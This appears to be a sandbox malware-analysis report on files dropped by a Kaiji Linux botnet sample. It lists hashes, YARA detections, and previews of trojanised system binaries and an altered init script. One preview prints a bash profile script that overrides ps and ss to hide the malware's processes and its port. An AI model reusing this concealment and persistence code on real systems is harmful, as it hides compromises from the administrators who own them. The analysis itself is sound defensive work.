                                                                          Preview:#!/bin/sh.# /etc/init.d/x11-common: set up the X server and ICE socket directories.### BEGIN INIT INFO.# Provides: x11-common.# Required-Start: $remote_fs.# Required-Stop: $remote_fs.# Default-Start: S.# Default-Stop:.# Short-Description: set up the X server and ICE socket directories.### END INIT INFO..set -e..PATH=/usr/bin:/usr/sbin:/bin:/sbin.SOCKET_DIR=.X11-unix.ICE_DIR=.ICE-unix... /lib/lsb/init-functions.if [ -f /etc/default/rcS ]; then./lib/system-mark. . /etc/default/rcS.fi..do_restorecon () {. # Restore file security context (SELinux).. if which restorecon >/dev/null 2>&1; then./lib/system-mark. restorecon "$1". fi.}..# create a directory in /tmp..# assumes /tmp has a sticky bit set (or is only writeable by root).set_up_dir () {. DIR="/tmp/$1".. if [ "$VERBOSE" != no ]; then./lib/system-mark. log_progress_msg "$DIR". fi. # if $DIR exists and isn't a directory, move it aside. if [ -e $DIR ] && ! [ -d $DIR ] || [ -h $DIR ]; then./lib/system-mar
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, Go BuildID=QWFqDvXFQJx9U3yrYPnA/M9zZFzD7RNozhwqfDdp2/4NamWS9qaPrrBZ2Ai_7G/E3zHuD-99wHqJg1owbs5, stripped
                                                                          Category:dropped
                                                                          Size (bytes):5242880
                                                                          Entropy (8bit):6.05036085544014
                                                                          Encrypted:false
                                                                          SSDEEP:24576:44v9ubX4NnJ+VWbqyUcN1Ib4zJqDu3WZZ+5YAKQqN02EXS3vUM6j0AJfuD/s3TW5:+VmmsDjfd5uBbTpHqufwmFp8qOTVI1
                                                                          MD5:C5F2DDE5DCA123520549BD745325FA64
                                                                          SHA1:2B154BF7D864B50F746348BC93044E8E939DBEE1
                                                                          SHA-256:B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F
                                                                          SHA-512:66AA8E660403689F1767899FE5423CECF9FCA44C9F3C8DF3937B4E6E87C147F6433FD530601D26F8781D8FFB39B26D3230360BF51632FF035913C9DC43E721C5
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_Kaiji_1, Description: Yara detected Kaiji, Source: /etc/opt.services.cfg, Author: Joe Security
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, Go BuildID=QWFqDvXFQJx9U3yrYPnA/M9zZFzD7RNozhwqfDdp2/4NamWS9qaPrrBZ2Ai_7G/E3zHuD-99wHqJg1owbs5, stripped
                                                                          Category:dropped
                                                                          Size (bytes):5242880
                                                                          Entropy (8bit):6.05036085544014
                                                                          Encrypted:false
                                                                          SSDEEP:24576:44v9ubX4NnJ+VWbqyUcN1Ib4zJqDu3WZZ+5YAKQqN02EXS3vUM6j0AJfuD/s3TW5:+VmmsDjfd5uBbTpHqufwmFp8qOTVI1
                                                                          MD5:C5F2DDE5DCA123520549BD745325FA64
                                                                          SHA1:2B154BF7D864B50F746348BC93044E8E939DBEE1
                                                                          SHA-256:B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F
                                                                          SHA-512:66AA8E660403689F1767899FE5423CECF9FCA44C9F3C8DF3937B4E6E87C147F6433FD530601D26F8781D8FFB39B26D3230360BF51632FF035913C9DC43E721C5
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_Kaiji_1, Description: Yara detected Kaiji, Source: /etc/profile.d/bash_cfg, Author: Joe Security
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:Bourne-Again shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):35
                                                                          Entropy (8bit):4.261725074756386
                                                                          Encrypted:false
                                                                          SSDEEP:3:TKH/binKE:siKE
                                                                          MD5:BE6E09DEC0A6249FD83851DAF92AE627
                                                                          SHA1:9FF81BB38A0FD5432575455D7D8334BD8D983CF7
                                                                          SHA-256:44BDD8B7F00094E163540A2B8C3CF973E72499BAA20B78F8051E2422163E1D0D
                                                                          SHA-512:CCF2BDC30F45A132DBDBBF1F008A06525B7EE4A46F09A11025BA05A55835F67356DBB4F8E826AFB28C73AFE5653C09C7CEAA082A2194A0D7C78BE101A4AD1F30
                                                                          Malicious:true
                                                                          Preview:#!/bin/bash./etc/profile.d/bash_cfg
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:Bourne-Again shell script, ASCII text executable, with very long lines (910)
                                                                          Category:dropped
                                                                          Size (bytes):6339
                                                                          Entropy (8bit):4.790805571410194
                                                                          Encrypted:false
                                                                          SSDEEP:192:sSahyOSP3ECqh8teaSahyOSP3ECqh8te0SahyOSP3ECqh8teUSahyOSP3ECqh8t8:mwyig4MK
                                                                          MD5:11A1887AA550DACE7A8D9BA60AE97E72
                                                                          SHA1:3D7D000DB5A71C38FE1FFD968B58C00865F81B03
                                                                          SHA-256:64C03F00E4A419B6ED09669968131C0BDC8DB47F7280F62C1AA3CB2400486315
                                                                          SHA-512:600BFE91D14F58EC1B5126BA97D5EEB1AB0D9A66252E4AEC23CBD812BA79A145FD9535F5B5E0C74C58BFC8FE283834F9A567C234E758E5DF69ACD7A3CAAB09C7
                                                                          Malicious:true
                                                                          Preview:#!/bin/bash.function ps { proc_name=$(/usr/bin/ps $@);proc_name=$(echo "$proc_name" | sed -e '/32675/d');proc_name=$(echo "$proc_name" | sed -e '/dns-tcp4/d');proc_name=$(echo "$proc_name" | sed -e '/quotaoff.service/d');proc_name=$(echo "$proc_name" | sed -e '/System.mod/d');proc_name=$(echo "$proc_name" | sed -e '/gateway.sh/d');proc_name=$(echo "$proc_name" | sed -e '/32675/d');proc_name=$(echo "$proc_name" | sed -e '/.mod/d');proc_name=$(echo "$proc_name" | sed -e '/libgdi.so.0.8.1/d');proc_name=$(echo "$proc_name" | sed -e '/opt.services.cfg/d');proc_name=$(echo "$proc_name" | sed -e '/system-mark/d');proc_name=$(echo "$proc_name" | sed -e '/ifconfig.cfg/d');proc_name=$(echo "$proc_name" | sed -e '/sleep/d');proc_name=$(echo "$proc_name" | sed -e '/seeintlog/d');proc_name=$(echo "$proc_name" | sed -e '/bash_cfg/d');proc_name=$(echo "$proc_name" | sed -e '/linux_arm6.elf/d');echo "$proc_name"; }.function ss { proc_name=$(/usr/bin/ss $@);proc_name=$(echo "$proc_name" | sed -e '/3267
                                                                          Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):76
                                                                          Entropy (8bit):3.7627880354948586
                                                                          Encrypted:false
                                                                          SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                                                          MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                                                          SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                                                          SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                                                          SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                                                          Malicious:false
                                                                          Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                                                          Process:/usr/sbin/cron
                                                                          File Type:very short file (no magic)
                                                                          Category:dropped
                                                                          Size (bytes):1
                                                                          Entropy (8bit):0.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:V:V
                                                                          MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                          SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                          SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                          SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                          Malicious:false
                                                                          Preview:0
                                                                          Process:/usr/sbin/cron
                                                                          File Type:very short file (no magic)
                                                                          Category:dropped
                                                                          Size (bytes):1
                                                                          Entropy (8bit):0.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:V:V
                                                                          MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                          SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                          SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                          SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                          Malicious:false
                                                                          Preview:0
                                                                          Process:/usr/sbin/cron
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):10
                                                                          Entropy (8bit):2.321928094887362
                                                                          Encrypted:false
                                                                          SSDEEP:3:HdqS/:9p/
                                                                          MD5:2C3CEAC524F626B1EC1A9DA9D31EED3F
                                                                          SHA1:6D3F4E4F07C413937572B1C24807D4D8E3FE9729
                                                                          SHA-256:5AFF29FE14DAEC8DE51D3279C539B5F4A9A678B951DAE02F20028B6B43756CCB
                                                                          SHA-512:397292CA64E0083A0A71255A17E384677E6F9FD64C7F1E6932E00F300D1FA37C2FB3075DDC816D5032D592E3865085184D2A2E1FD5E0AB10176D13E64E4C7836
                                                                          Malicious:false
                                                                          Preview:5780.5780.
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):120
                                                                          Entropy (8bit):2.9188772313496707
                                                                          Encrypted:false
                                                                          SSDEEP:3:EfFeJMLIRaTUdVvX:EfkJMLIRaYdVf
                                                                          MD5:375D11B8F7A0EFE6186A83355BA054A2
                                                                          SHA1:72C0EDBD16C8E114CA2E13F91F3CE261B5E6570D
                                                                          SHA-256:1A542B2CB9F56B634B1786EB5870A71C7737420951D1D913FF83C987C35DC987
                                                                          SHA-512:48CA0D623F8F8D10C5BCDD0C6EA15C259F1E7C9FA9DF765EB1FEAAC9ADA7C96D08674124F1304E39A91850A129C70BBC19CEFAFC2A82D97762BCE02C162C2243
                                                                          Malicious:false
                                                                          Preview:5488 (/tmp/linux_arm6.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294901136 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, Go BuildID=QWFqDvXFQJx9U3yrYPnA/M9zZFzD7RNozhwqfDdp2/4NamWS9qaPrrBZ2Ai_7G/E3zHuD-99wHqJg1owbs5, stripped
                                                                          Category:dropped
                                                                          Size (bytes):5242880
                                                                          Entropy (8bit):6.05036085544014
                                                                          Encrypted:false
                                                                          SSDEEP:24576:44v9ubX4NnJ+VWbqyUcN1Ib4zJqDu3WZZ+5YAKQqN02EXS3vUM6j0AJfuD/s3TW5:+VmmsDjfd5uBbTpHqufwmFp8qOTVI1
                                                                          MD5:C5F2DDE5DCA123520549BD745325FA64
                                                                          SHA1:2B154BF7D864B50F746348BC93044E8E939DBEE1
                                                                          SHA-256:B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F
                                                                          SHA-512:66AA8E660403689F1767899FE5423CECF9FCA44C9F3C8DF3937B4E6E87C147F6433FD530601D26F8781D8FFB39B26D3230360BF51632FF035913C9DC43E721C5
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_Kaiji_1, Description: Yara detected Kaiji, Source: /usr/bin/dir, Author: Joe Security
                                                                          Preview:.ELF..............(.........4...........4. ...(.........4...4...4...................................d...d.............................(...(...............)...*...*... ... ...............J...K...K..K..p...........Q.td...............................e.....................*....................................................................(.................].............*...).......................................4.....................e...........p.5.p.4.L...................o.............5...4.x...................y...........8.6.8.5.................................8.6.8.5....................5.............K...J.@...............................@.K.@.J.h.................................O...N..V...............................KP..KO.\!...............................lQ..lP..e..................C...................d.......................................................................................................................................................................................
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, Go BuildID=QWFqDvXFQJx9U3yrYPnA/M9zZFzD7RNozhwqfDdp2/4NamWS9qaPrrBZ2Ai_7G/E3zHuD-99wHqJg1owbs5, stripped
                                                                          Category:dropped
                                                                          Size (bytes):5242880
                                                                          Entropy (8bit):6.05036085544014
                                                                          Encrypted:false
                                                                          SSDEEP:24576:44v9ubX4NnJ+VWbqyUcN1Ib4zJqDu3WZZ+5YAKQqN02EXS3vUM6j0AJfuD/s3TW5:+VmmsDjfd5uBbTpHqufwmFp8qOTVI1
                                                                          MD5:C5F2DDE5DCA123520549BD745325FA64
                                                                          SHA1:2B154BF7D864B50F746348BC93044E8E939DBEE1
                                                                          SHA-256:B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F
                                                                          SHA-512:66AA8E660403689F1767899FE5423CECF9FCA44C9F3C8DF3937B4E6E87C147F6433FD530601D26F8781D8FFB39B26D3230360BF51632FF035913C9DC43E721C5
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_Kaiji_1, Description: Yara detected Kaiji, Source: /usr/bin/find, Author: Joe Security
                                                                          Preview:.ELF..............(.........4...........4. ...(.........4...4...4...................................d...d.............................(...(...............)...*...*... ... ...............J...K...K..K..p...........Q.td...............................e.....................*....................................................................(.................].............*...).......................................4.....................e...........p.5.p.4.L...................o.............5...4.x...................y...........8.6.8.5.................................8.6.8.5....................5.............K...J.@...............................@.K.@.J.h.................................O...N..V...............................KP..KO.\!...............................lQ..lP..e..................C...................d.......................................................................................................................................................................................
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=88509cf24745b54bfaf44487664f3c7647ca74d8, for GNU/Linux 3.2.0, stripped
                                                                          Category:dropped
                                                                          Size (bytes):142144
                                                                          Entropy (8bit):5.901302008465562
                                                                          Encrypted:false
                                                                          SSDEEP:1536:hfDyKo9d0mLrTpjQ2xioEbuGMC0kDLmLUFqpfgBLO+qDutbxHFb65RRnSULS0pJs:hDnGd0mxst7DLmg0OBLIupbn0pJqN
                                                                          MD5:079B45463B8B7F66D9EC2C24B2853FBE
                                                                          SHA1:20BF016B554AA799775CACD62328E8164DE2C811
                                                                          SHA-256:C8C68BF0B2D02D96EF345DB8718A5E85E19F6D25189686A945D7BA39AA0F2E39
                                                                          SHA-512:996347FDEC45C941D363F511F8BE56C000F91AD0FD9846273CA186AE7A40423A02B5F6F9C99AAB12F092916418A101E0DFA110F7AFFE11626E8EC9961292C7B8
                                                                          Malicious:true
                                                                          Preview:.ELF..............>......g......@........#..........@.8...@.............@.......@.......@........................................................................................................................6.......6.......................@.......@.......@.......5.......5..............................................P.......P................................ ....... ......X.......H%......................X.......X*......X*......................................8.......8.......8....... ....... .......................X.......X.......X.......D.......D...............S.td....8.......8.......8....... ....... ...............P.td....L.......L.......L.......,.......,...............Q.td....................................................R.td............. ....... ............................../lib64/ld-linux-x86-64.so.2.................GNU.............................GNU..P..GE.K..D.fO<vG.t.............GNU.........................o.............. .).b@....$...*I!. ...a..$...o.......q...r...u...z...
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=b8b9756abacab10f704aec42954e3fd2292f1e85, for GNU/Linux 3.2.0, stripped
                                                                          Category:dropped
                                                                          Size (bytes):320160
                                                                          Entropy (8bit):6.050007025938927
                                                                          Encrypted:false
                                                                          SSDEEP:3072:ohyHG3Khv1Ur3jv7lVYZRAfEFW654JUo65Cf4YAUEBn5pvOKYLpBdy4y0+pJhzj:og6jlWZReEFLCfZZab41U0g
                                                                          MD5:B68EF002F84CC54DD472238BA7DF80AB
                                                                          SHA1:3C326E1993103B601CB91DE8552CE5C0D9D159FF
                                                                          SHA-256:92A2BADE19A90A1BD81E4D2C2DE646DDF971ABA9C78DF6E31B2B567C94FDE175
                                                                          SHA-512:70CE3AB2CCFB1FADC603D524F3E4C11518F5C55BBE5BAAEF74DB50727FB77AD32D74CA09D09D2FF0CAE690FADD82966F622A83E0E3052F267AD1A74C26EE3E95
                                                                          Malicious:true
                                                                          Preview:.ELF..............>.....`.......@....... ...........@.8...@.............@.......@.......@........................................................................................................................j.......j.......................p.......p.......p.......1.......1.......................................................................................................(......h3...................... ....... ....... .......................................8.......8.......8....... ....... .......................X.......X.......X.......D.......D...............S.td....8.......8.......8....... ....... ...............P.td.....%.......%.......%..............................Q.td....................................................R.td..................................................../lib64/ld-linux-x86-64.so.2.................GNU.............................GNU...uj...pJ.B.N?.)/..............GNU.......................................@.R..>.H."... ............(........k...=.e.m.Pv...|
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=2f15ad836be3339dec0e2e6a3c637e08e48aacbd, for GNU/Linux 3.2.0, stripped
                                                                          Category:dropped
                                                                          Size (bytes):142144
                                                                          Entropy (8bit):5.901203666912634
                                                                          Encrypted:false
                                                                          SSDEEP:1536:BgfDyKo9d0mLrTpjQ2xioEbuGMC0kDLmLUFqpfgBLO+qDutbxHFb65RRnSULS0pF:BADnGd0mxst7DLmg0OBLIupbn0pJqN
                                                                          MD5:E7793F15C2FF7E747B4BC7079F5CD4F7
                                                                          SHA1:732458574C63C3790CAD093A36EADFB990D11EE6
                                                                          SHA-256:1E39354A6E481DAC48375BFEBB126FD96AED4E23BAB3C53ED6ECF1C5E4D5736D
                                                                          SHA-512:233382698C722F0AF209865F7E998BC5A0A957CA8389E8A84BA4172F2413BEA1889DD79B12607D9577FD2FC17F300C8E7F223C2179F66786E5A11E28F4D68E53
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_Kaiji_1, Description: Yara detected Kaiji, Source: /usr/bin/include/ls, Author: Joe Security
                                                                          Preview:.ELF..............>......g......@........#..........@.8...@.............@.......@.......@........................................................................................................................6.......6.......................@.......@.......@.......5.......5..............................................P.......P................................ ....... ......X.......H%......................X.......X*......X*......................................8.......8.......8....... ....... .......................X.......X.......X.......D.......D...............S.td....8.......8.......8....... ....... ...............P.td....L.......L.......L.......,.......,...............Q.td....................................................R.td............. ....... ............................../lib64/ld-linux-x86-64.so.2.................GNU.............................GNU./...k.3....j<c~...............GNU.........................o.............. .).b@....$...*I!. ...a..$...o.......q...r...u...z...
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=b70e28f8c4071cf6da1a5d9bdf83301153a83a49, for GNU/Linux 3.2.0, stripped
                                                                          Category:dropped
                                                                          Size (bytes):175744
                                                                          Entropy (8bit):5.936169929539334
                                                                          Encrypted:false
                                                                          SSDEEP:3072:OF7SUSobvRwXmq4jOFFa5xMxlVUo2Ljy5frrI3ZaAZEWI4+Qap8AY8Vl/2eOmFW3:OMUSkymqiOFLL2Ljy5frrI3ZaAZEWI4+
                                                                          MD5:061386937EC7ACF924438A2643A32BE0
                                                                          SHA1:01A044B9E58839BEA3E58C66CB32ACC16241BF91
                                                                          SHA-256:8A26BBAE9EB85AA98EF29CFE5B0A291234DB6EB394C3E0C2841983DCF7DDA959
                                                                          SHA-512:2DE2E56AC4C32F47B4A1945CCFB0DB378E6D59019EE8004E3E5D2EC8935EFB5AA8EE14B8A0B21C61A267E195D42A3232A6DCADE8720DE06118FD579277F59DB7
                                                                          Malicious:true
                                                                          Preview:.ELF..............>.....`=......@...................@.8...@.............@.......@.......@.......................................................................................................................H%......H%.......................0.......0.......0....................................... ....... ....... ......Ps......Ps......................0.......0.......0.......x...............................h.......h.......h.......................................8.......8.......8....... ....... .......................X.......X.......X.......D.......D...............S.td....8.......8.......8....... ....... ...............P.td.....k.......k.......k......<.......<...............Q.td....................................................R.td....0.......0.......0.............................../lib64/ld-linux-x86-64.so.2.................GNU.............................GNU...(.......]..0.S.:I............GNU.........................p...................p...r.......(....e.m9..........................
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=51b4397f31c5992fa18047069bfa92ca1444ef99, stripped
                                                                          Category:dropped
                                                                          Size (bytes):158288
                                                                          Entropy (8bit):5.495895004028753
                                                                          Encrypted:false
                                                                          SSDEEP:1536:lVVZidyDSsOKijSMQHiubRaPuFzbCPopEjApaSH0YnYHAznwfoORW3yfrEjucVBF:fidyKKijokmQPHcpaSHyftW3XUsNTf
                                                                          MD5:D31D945767DD5A51E78FF0069533635F
                                                                          SHA1:64665A224F472B07778819F38FF5A300C1712EEB
                                                                          SHA-256:7AF5F6CDA055B65E31298FE20ED4456A87D2CA92803552BC0D3422F0E1A1FDA1
                                                                          SHA-512:8EFEB8DF05338ABBD4305FC48914A91012EDC91C2F6423BA59F4E54303C867DC7C5723EE94ADE118585AA6965CC888558E699533F4F9D5EEB22E45C57634A628
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_Kaiji_1, Description: Yara detected Kaiji, Source: /usr/bin/include/netstat, Author: Joe Security
                                                                          Preview:.ELF..............>.....P.......@.......Pc..........@.8...@.............@.......@.......@.......h.......h........................................................................................................p.......p..............................................}.......}...............................................h.......h........................0.......@.......@......h1.......E.......................J.......Z.......Z..............................................................D.......D...............P.td....................................................Q.td....................................................R.td.....0.......@.......@......P.......P.............../lib64/ld-linux-x86-64.so.2.............GNU.............................GNU.Q.9.1./..G......D.C...j..............0....4..%.....".p.^3...As@...t"0..R..2 ..(.....@%2..H3...!$.j...k.......o...q.......s...v...x...y...{...}...................................................................................................
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=21b21cccacabfe9b0573bf0b894279a9502005b4, for GNU/Linux 3.2.0, stripped
                                                                          Category:dropped
                                                                          Size (bytes):137688
                                                                          Entropy (8bit):4.861913553163927
                                                                          Encrypted:false
                                                                          SSDEEP:1536:QQN5YhnrOag7gX/LBzGLEcQrAqgyz51Xs+9EEgG54MZszIWzbr63XrZOIhK5nn5F:QNXXFcsbsprg7Z9hK15IcKR4CS
                                                                          MD5:AB48054475A6F70F8E7FA847331F3327
                                                                          SHA1:83FEB47FF6E58A79152C2AD2882D6332751F4EA1
                                                                          SHA-256:6E1BE2FF79ADF6A05AD09B6DF87618A5F9857378A2978BEB1DEC12E20FD34844
                                                                          SHA-512:784A85F3758D18E23FDDD40A0DE6322B2C6CD63216C22433971A13522E18A34FCB3155AC400567DFEB32CCD54C2313731C8EFC712BF8FB9C05B2495DE1E5BF23
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_Kaiji_1, Description: Yara detected Kaiji, Source: /usr/bin/include/ps, Author: Joe Security
                                                                          Preview:.ELF..............>.............@.......X...........@.8...@.............@.......@.......@..............................................................................................................................................................................................................`.......`.......`.......c.......c......................p.......p.......p........A......xT..............................................................................8.......8.......8....... ....... .......................X.......X.......X.......D.......D...............S.td....8.......8.......8....... ....... ...............P.td....................................................Q.td....................................................R.td....p.......p.......p........@.......@............../lib64/ld-linux-x86-64.so.2.................GNU.............................GNU.!.......s...By.P ..............GNU.........................a............... ...a...d.......(....b&t.e.m.Pv..;O..bA..^~.9......
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=78306939741bc1e7a074f53e1b6077eb0b275b76, for GNU/Linux 3.2.0, stripped
                                                                          Category:dropped
                                                                          Size (bytes):168800
                                                                          Entropy (8bit):5.521607353074361
                                                                          Encrypted:false
                                                                          SSDEEP:3072:5Wk6ydCmF77TznCsTYMW9mFtR6fm+CKlpzdc4BuiIdn:g/MvFfZ1N6ttzzdc4BuiId
                                                                          MD5:51D83131B398A97DD38555BA57084721
                                                                          SHA1:7D392A87F7DB787DFA85FBCDF2A5BA6F0B59B4ED
                                                                          SHA-256:E429F9D16A4CD64593B94DEE8309A427FE8CA57765BF0D2E7B822EFD123FE768
                                                                          SHA-512:ADC7137DF75410C2535986C1E86C2E92E58F9BEE70094F72F1F7ADF3DB125720CE281EB3F48474B0E192D672E96CBB1BC6E1EF6B26B10BF76A412C4516948216
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_Kaiji_1, Description: Yara detected Kaiji, Source: /usr/bin/include/ss, Author: Joe Security
                                                                          Preview:.ELF..............>......e......@...................@.8...@.............@.......@.......@........................................................................................................................;.......;.......................@.......@.......@.......o.......o..............................................................................0?......0O......0O......\K......H........................I.......Y.......Y......0.......0.......................8.......8.......8....... ....... .......................X.......X.......X.......D.......D...............S.td....8.......8.......8....... ....... ...............P.td....`.......`.......`.......T.......T...............Q.td....................................................R.td....0?......0O......0O............................../lib64/ld-linux-x86-64.so.2.................GNU.............................GNU.x0i9t...t.>.`w..'[v............GNU.........................................................(...4Btu.e.mfUa.9..2...............
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, Go BuildID=QWFqDvXFQJx9U3yrYPnA/M9zZFzD7RNozhwqfDdp2/4NamWS9qaPrrBZ2Ai_7G/E3zHuD-99wHqJg1owbs5, stripped
                                                                          Category:dropped
                                                                          Size (bytes):5242880
                                                                          Entropy (8bit):6.05036085544014
                                                                          Encrypted:false
                                                                          SSDEEP:24576:44v9ubX4NnJ+VWbqyUcN1Ib4zJqDu3WZZ+5YAKQqN02EXS3vUM6j0AJfuD/s3TW5:+VmmsDjfd5uBbTpHqufwmFp8qOTVI1
                                                                          MD5:C5F2DDE5DCA123520549BD745325FA64
                                                                          SHA1:2B154BF7D864B50F746348BC93044E8E939DBEE1
                                                                          SHA-256:B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F
                                                                          SHA-512:66AA8E660403689F1767899FE5423CECF9FCA44C9F3C8DF3937B4E6E87C147F6433FD530601D26F8781D8FFB39B26D3230360BF51632FF035913C9DC43E721C5
                                                                          Malicious:true
                                                                          Preview:.ELF..............(.........4...........4. ...(.........4...4...4...................................d...d.............................(...(...............)...*...*... ... ...............J...K...K..K..p...........Q.td...............................e.....................*....................................................................(.................].............*...).......................................4.....................e...........p.5.p.4.L...................o.............5...4.x...................y...........8.6.8.5.................................8.6.8.5....................5.............K...J.@...............................@.K.@.J.h.................................O...N..V...............................KP..KO.\!...............................lQ..lP..e..................C...................d.......................................................................................................................................................................................
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, Go BuildID=QWFqDvXFQJx9U3yrYPnA/M9zZFzD7RNozhwqfDdp2/4NamWS9qaPrrBZ2Ai_7G/E3zHuD-99wHqJg1owbs5, stripped
                                                                          Category:dropped
                                                                          Size (bytes):5242880
                                                                          Entropy (8bit):6.05036085544014
                                                                          Encrypted:false
                                                                          SSDEEP:24576:44v9ubX4NnJ+VWbqyUcN1Ib4zJqDu3WZZ+5YAKQqN02EXS3vUM6j0AJfuD/s3TW5:+VmmsDjfd5uBbTpHqufwmFp8qOTVI1
                                                                          MD5:C5F2DDE5DCA123520549BD745325FA64
                                                                          SHA1:2B154BF7D864B50F746348BC93044E8E939DBEE1
                                                                          SHA-256:B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F
                                                                          SHA-512:66AA8E660403689F1767899FE5423CECF9FCA44C9F3C8DF3937B4E6E87C147F6433FD530601D26F8781D8FFB39B26D3230360BF51632FF035913C9DC43E721C5
                                                                          Malicious:true
                                                                          Preview:.ELF..............(.........4...........4. ...(.........4...4...4...................................d...d.............................(...(...............)...*...*... ... ...............J...K...K..K..p...........Q.td...............................e.....................*....................................................................(.................].............*...).......................................4.....................e...........p.5.p.4.L...................o.............5...4.x...................y...........8.6.8.5.................................8.6.8.5....................5.............K...J.@...............................@.K.@.J.h.................................O...N..V...............................KP..KO.\!...............................lQ..lP..e..................C...................d.......................................................................................................................................................................................
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, Go BuildID=QWFqDvXFQJx9U3yrYPnA/M9zZFzD7RNozhwqfDdp2/4NamWS9qaPrrBZ2Ai_7G/E3zHuD-99wHqJg1owbs5, stripped
                                                                          Category:dropped
                                                                          Size (bytes):5242880
                                                                          Entropy (8bit):6.05036085544014
                                                                          Encrypted:false
                                                                          SSDEEP:24576:44v9ubX4NnJ+VWbqyUcN1Ib4zJqDu3WZZ+5YAKQqN02EXS3vUM6j0AJfuD/s3TW5:+VmmsDjfd5uBbTpHqufwmFp8qOTVI1
                                                                          MD5:C5F2DDE5DCA123520549BD745325FA64
                                                                          SHA1:2B154BF7D864B50F746348BC93044E8E939DBEE1
